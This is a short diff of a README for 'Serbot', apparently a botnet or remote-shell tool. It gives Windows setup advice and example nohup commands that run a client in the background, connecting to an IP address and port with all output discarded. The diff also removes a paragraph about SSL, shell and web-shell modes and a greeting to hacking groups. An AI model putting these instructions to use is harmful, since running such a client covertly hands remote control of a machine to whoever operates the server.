D0L0S/Serbot/README.md

 You simply have to remove the “#!/usr/bin/env python2″ at the top of every script to get this up and running on windows.

-#####Extra:
-If you’re trying to activate the Client threw ssl, shell or web shell then you have to run the Client.py in another process in the background or else your shell will dive into an endless loop and the best way to do that in Linux would be using nohup.

 ######Example:
 nohup python client.py 15.48.158.15 1567 > /dev/null &

 nohup python client.py 15.48.158.15 1567 > /dev/null 2>&1 &

-Greetings to Team Prophetic, Chaoshackerz and all the followers of https://dotcppfile.wordpress.com/, That’s all, dotcppfile.